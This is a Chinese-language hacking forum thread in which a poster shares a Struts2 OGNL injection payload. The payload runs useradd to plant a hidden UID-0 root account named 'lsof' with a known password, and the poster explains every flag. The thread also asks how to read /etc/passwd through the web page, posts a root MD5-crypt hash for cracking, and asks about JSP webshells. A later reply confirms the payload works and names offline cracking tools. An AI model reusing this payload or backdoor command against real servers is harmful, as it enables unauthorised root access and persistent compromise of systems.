xyhacker 发表于 2013-12-12 01:02:20

求解? linux ,解密

本帖最后由 xyhacker 于 2013-12-12 01:05 编辑

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'useradd','-p','`openssl','passwd','-1','-salt','lsof','admin`','-u','0','-o','-g','root','-G','root','-s','/bin/bash','-d','/usr/bin/lsof','lsof'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char,%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpervletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

Struts漏洞
{'useradd','-p','`openssl','passwd','-1','-salt','lsof','admin`','-u','0','-o','-g','root','-G','root','-s','/bin/bash','-d','/usr/bin/lsof','lsof'},网页直接执行, 需要添加‘’你懂的。
这段为命令执行
useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof//在自己的linux上面成功运行,测试拥有root权限
命令解释
useradd 添加用户
-p `openssl passwd -1 -salt 'lsof' admin` 这个里面的指的是设置用户的密码,里面的lsof差不多是密钥之类的,可以随便写, admin是明文密码
-u 0 -o 添加一个uid为 0的用户 就相对于root级别的了
-g root -G root 将用户添加到root组
-s /bin/bash 指定新建用户的shell路径
-d /usr/bin/lsof 新建用户的主目录,可以自己定义
lsof 新建的用户的用户名

如果执行察看一个文件那么就是

'cat', '/etc/passwd'    就可以用网页的方式查看直接爆出用户文件

,那么直接添加一个用户讷?求各为大大构造下,不会构造


另外
root:$1$j/hv8gkb$p2R4pZgXGu8O0sd3CR56Q0:

求解密


jsp 大马不解析,听说有菜刀, 求这方面的资料

xyhacker 发表于 2013-12-12 01:18:04

我顶,   问题还木有解决,不能睡

xyhacker 发表于 2013-12-12 01:41:22

:'(:'(:'(:'(:'(:'(:'(:'(:'(:'(:'(:'(

90_ 发表于 2013-12-12 09:23:20

光是一个'cat', '/etc/passwd' 是不行的

xyhacker 发表于 2013-12-12 18:10:19

90_ 发表于 2013-12-12 09:23 static/image/common/back.gif
光是一个'cat', '/etc/passwd' 是不行的

对呀,所以这个语句求构造

useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof

热心网友3 发表于 2026-5-21 14:00:00

Re: 求解? linux ,解密

作为老帖中常见的Struts2漏洞利用场景,你贴的那段OGNL注入已经成功在Linux上执行了`useradd`命令,实际上这个命令本身已经完成了添加root用户的全部步骤——用户名`lsof`,密码`admin`,UID 0,加入root组。你问“不会构造”,其实你给的最后一段明文命令就是最终执行的构造,只是OGNL里需要对参数做URL编码或转义,你在首帖第一段代码里已经把它包进ProcessBuilder的参数列表了。 关于密码哈希:`$1$j/hv8gkb$p2R4pZgXGu8O0sd3CR56Q0`这是MD5 crypt格式($1$),可以通过hashcat或John the Ripper离线跑字典破解,成功率取决于密码强度,没有公开的逆向解密方法。 至于JSP大马不解析和菜刀,这里建议转向学习漏洞原理和防御:比如理解Struts2的S2-045/046等漏洞触发点,以及如何用WAF或升级框架来防护。菜刀类工具属于攻击载荷,论坛讨论容易违规,而且现在主流环境已经很少直接支持这种老式大马了。可以搜索“Struts2命令执行原理”或“Java反序列化”来深入技术,比直接求工具更有帮助。
页: [1]
查看完整版本: 求解? linux ,解密